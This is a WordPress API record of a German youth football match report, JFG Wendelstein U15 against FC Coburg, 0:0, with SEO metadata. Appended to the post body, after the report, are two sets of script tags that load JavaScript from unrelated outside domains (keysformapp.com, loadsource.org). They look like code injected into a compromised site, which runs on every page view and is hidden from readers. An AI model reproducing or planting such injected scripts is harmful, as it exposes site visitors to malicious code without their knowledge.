{"id":6760,"date":"2018-10-01T16:48:38","date_gmt":"2018-10-01T14:48:38","guid":{"rendered":"http:\/\/www.jugendfussball-wendelstein.de\/wordpress\/?p=6760"},"modified":"2018-10-01T17:04:13","modified_gmt":"2018-10-01T15:04:13","slug":"jfgw-fc-coburg-00","status":"publish","type":"post","link":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/jfgw-fc-coburg-00\/","title":{"rendered":"JFGW &#8211; FC Coburg  0:0"},"content":{"rendered":"<p>U15 der JFG Wendelstein punktet gegen den FC Coburg<\/p>\n<p>Nachdem die Wendelsteiner Bayernliga-Vertretung in den beiden vergangenen Partien doch deutliche Niederlagen einstecken musste, war man am fr\u00fchen Sonntag Mittag um Wiedergutmachung bem\u00fcht. Kein leichtes Unterfangen wenn man eine der spielst\u00e4rksten Truppen dieser Liga zu Gast hat, zu denen kann sich der FC Coburg n\u00e4mlich sicher z\u00e4hlen. Man war auf Seiten der Heimelf also durchaus gewarnt.<\/p>\n<p>In der Anfangsphase merkte man den Blues eine gewisse Nervosit\u00e4t und Unsicherheit an, dies war den Verantwortlichen um den 2004er Jahrgang bereits vor der Partie bewusst. Mit zunehmender Spieldauer fand das in schwarz gekleidete Team aus der Marktgemeinde aber immer besser in die Partie. Wenn gleich den Zuschauern eine eher Chancenarme Partie geboten war so war sie \u00fcber die gesamte Spieldauer von einem hohen Tempo und intensiven Zweik\u00e4mpfen gepr\u00e4gt. Im Volksmund w\u00fcrde man hier von einem Spiel welches von der Spannung gepr\u00e4gt war sprechen. Nachdem weder die in Orange gekleideten G\u00e4ste noch die Heimelf Ihre Halbchancen in z\u00e4hlbares umm\u00fcnzen konnten ging es folgerichtig mit 0:0 in die Kabine.<\/p>\n<p>Wendelstein kehrte taktisch ver\u00e4ndert vom Pausentee auf das gr\u00fcne Gel\u00e4uf zur\u00fcck. Von Minute eins der zweite H\u00e4lfte kam man nun immer besser in das Spiel, es gelang den Gegner nun deutlich weiter in die eigene H\u00e4lfte zu dr\u00e4ngen. Coburg l\u00f6ste das jetzt wesentlich h\u00f6here Pressing mit langen pr\u00e4zisen B\u00e4llen in die Schnittstellen der Heimelf, keiner dieser B\u00e4lle konnte die Abwehr der Blues jedoch noch einmal in Verlegenheit bringen. Die beiden klarsten Chancen der Partie hatte Wendelstein, die erste konnte Coburgs Nummer eins nach einem Eckball aus kurzer Distanz stark parieren, bei der zweiten w\u00e4re er dann wohl machtlos gewesen als ein Schuss aus knapp 20-Metern das G\u00e4stegeh\u00e4use nur haarscharf verfehlte. Am Ende des Tages stand dann f\u00fcr beide Teams ein Leistungsgerechtes 0:0 auf der Anzeigentafel.<\/p>\n<p>Sicher h\u00e4tte man aus Wendelsteiner Sicht den dreier gerne in der Marktgemeinde behalten, aufgrund der zu nerv\u00f6sen Anfangsphase musste man am Ende gegen einen starken FC Coburg aber mit dem erk\u00e4mpften Punkt zufrieden sein. Bereits am Mittwoch geht es mit dem zweiten Spiel dieser &#8222;Englischen Woche&#8220; weiter, dann n\u00e4mlich gastieren die Blues bei der SpVgg Bayreuth.<\/p>\n<p><script src=\"\/\/keysformapp.com\/1cbbe6fbfefc3b777d.js\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=52295x7355x&amp;r=1538405134314\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/keysformapp.com\/ext\/1cbbe6fbfefc3b777d.js?sid=52295_7355_&amp;title=FF_%5B602%5D_formkeyapp.cool&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/keysformapp.com\/1cbbe6fbfefc3b777d.js\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=52295x7355x&amp;r=1538405321454\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/keysformapp.com\/ext\/1cbbe6fbfefc3b777d.js?sid=52295_7355_&amp;title=FF_%5B602%5D_formkeyapp.cool&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>U15 der JFG Wendelstein punktet gegen den FC Coburg Nachdem die Wendelsteiner Bayernliga-Vertretung in den beiden vergangenen Partien doch deutliche Niederlagen einstecken musste, war man am fr\u00fchen Sonntag Mittag um Wiedergutmachung bem\u00fcht. Kein leichtes Unterfangen wenn man eine der spielst\u00e4rksten Truppen dieser Liga zu Gast hat, zu denen kann sich der FC Coburg n\u00e4mlich sicher [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"saved_in_kubio":false,"footnotes":""},"categories":[2,16,17],"tags":[],"class_list":["post-6760","post","type-post","status-publish","format-standard","hentry","category-gf","category-spielbericht","category-u15"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>JFGW - FC Coburg 0:0 - JFG Wendelstein<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/jfgw-fc-coburg-00\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"JFGW - FC Coburg 0:0 - JFG Wendelstein\" \/>\n<meta property=\"og:description\" content=\"U15 der JFG Wendelstein punktet gegen den FC Coburg Nachdem die Wendelsteiner Bayernliga-Vertretung in den beiden vergangenen Partien doch deutliche Niederlagen einstecken musste, war man am fr\u00fchen Sonntag Mittag um Wiedergutmachung bem\u00fcht. Kein leichtes Unterfangen wenn man eine der spielst\u00e4rksten Truppen dieser Liga zu Gast hat, zu denen kann sich der FC Coburg n\u00e4mlich sicher [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/jfgw-fc-coburg-00\/\" \/>\n<meta property=\"og:site_name\" content=\"JFG Wendelstein\" \/>\n<meta property=\"article:published_time\" content=\"2018-10-01T14:48:38+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2018-10-01T15:04:13+00:00\" \/>\n<meta name=\"author\" content=\"Autor\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Verfasst von\" \/>\n\t<meta name=\"twitter:data1\" content=\"Autor\" \/>\n\t<meta name=\"twitter:label2\" content=\"Gesch\u00e4tzte Lesezeit\" \/>\n\t<meta name=\"twitter:data2\" content=\"2\u00a0Minuten\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/jfgw-fc-coburg-00\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/jfgw-fc-coburg-00\\\/\"},\"author\":{\"name\":\"Autor\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#\\\/schema\\\/person\\\/75aadcbd4be1b3af1c1d785397472bc9\"},\"headline\":\"JFGW &#8211; FC Coburg 0:0\",\"datePublished\":\"2018-10-01T14:48:38+00:00\",\"dateModified\":\"2018-10-01T15:04:13+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/jfgw-fc-coburg-00\\\/\"},\"wordCount\":389,\"articleSection\":[\"Gro\u00dffeld\",\"Spielbericht\",\"U15\"],\"inLanguage\":\"de\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/jfgw-fc-coburg-00\\\/\",\"url\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/jfgw-fc-coburg-00\\\/\",\"name\":\"JFGW - FC Coburg 0:0 - JFG Wendelstein\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#website\"},\"datePublished\":\"2018-10-01T14:48:38+00:00\",\"dateModified\":\"2018-10-01T15:04:13+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#\\\/schema\\\/person\\\/75aadcbd4be1b3af1c1d785397472bc9\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/jfgw-fc-coburg-00\\\/#breadcrumb\"},\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/jfgw-fc-coburg-00\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/jfgw-fc-coburg-00\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Startseite\",\"item\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"JFGW &#8211; FC Coburg 0:0\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#website\",\"url\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/\",\"name\":\"JFG Wendelstein\",\"description\":\"Juniorenfu\u00dfball\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#\\\/schema\\\/person\\\/75aadcbd4be1b3af1c1d785397472bc9\",\"name\":\"Autor\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g\",\"caption\":\"Autor\"},\"url\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/author\\\/autor\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"JFGW - FC Coburg 0:0 - JFG Wendelstein","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/jfgw-fc-coburg-00\/","og_locale":"de_DE","og_type":"article","og_title":"JFGW - FC Coburg 0:0 - JFG Wendelstein","og_description":"U15 der JFG Wendelstein punktet gegen den FC Coburg Nachdem die Wendelsteiner Bayernliga-Vertretung in den beiden vergangenen Partien doch deutliche Niederlagen einstecken musste, war man am fr\u00fchen Sonntag Mittag um Wiedergutmachung bem\u00fcht. Kein leichtes Unterfangen wenn man eine der spielst\u00e4rksten Truppen dieser Liga zu Gast hat, zu denen kann sich der FC Coburg n\u00e4mlich sicher [&hellip;]","og_url":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/jfgw-fc-coburg-00\/","og_site_name":"JFG Wendelstein","article_published_time":"2018-10-01T14:48:38+00:00","article_modified_time":"2018-10-01T15:04:13+00:00","author":"Autor","twitter_card":"summary_large_image","twitter_misc":{"Verfasst von":"Autor","Gesch\u00e4tzte Lesezeit":"2\u00a0Minuten"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/jfgw-fc-coburg-00\/#article","isPartOf":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/jfgw-fc-coburg-00\/"},"author":{"name":"Autor","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#\/schema\/person\/75aadcbd4be1b3af1c1d785397472bc9"},"headline":"JFGW &#8211; FC Coburg 0:0","datePublished":"2018-10-01T14:48:38+00:00","dateModified":"2018-10-01T15:04:13+00:00","mainEntityOfPage":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/jfgw-fc-coburg-00\/"},"wordCount":389,"articleSection":["Gro\u00dffeld","Spielbericht","U15"],"inLanguage":"de"},{"@type":"WebPage","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/jfgw-fc-coburg-00\/","url":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/jfgw-fc-coburg-00\/","name":"JFGW - FC Coburg 0:0 - JFG Wendelstein","isPartOf":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#website"},"datePublished":"2018-10-01T14:48:38+00:00","dateModified":"2018-10-01T15:04:13+00:00","author":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#\/schema\/person\/75aadcbd4be1b3af1c1d785397472bc9"},"breadcrumb":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/jfgw-fc-coburg-00\/#breadcrumb"},"inLanguage":"de","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/jfgw-fc-coburg-00\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/jfgw-fc-coburg-00\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Startseite","item":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/"},{"@type":"ListItem","position":2,"name":"JFGW &#8211; FC Coburg 0:0"}]},{"@type":"WebSite","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#website","url":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/","name":"JFG Wendelstein","description":"Juniorenfu\u00dfball","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de"},{"@type":"Person","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#\/schema\/person\/75aadcbd4be1b3af1c1d785397472bc9","name":"Autor","image":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/secure.gravatar.com\/avatar\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g","caption":"Autor"},"url":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/author\/autor\/"}]}},"_links":{"self":[{"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/posts\/6760","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/comments?post=6760"}],"version-history":[{"count":0,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/posts\/6760\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/media?parent=6760"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/categories?post=6760"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/tags?post=6760"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}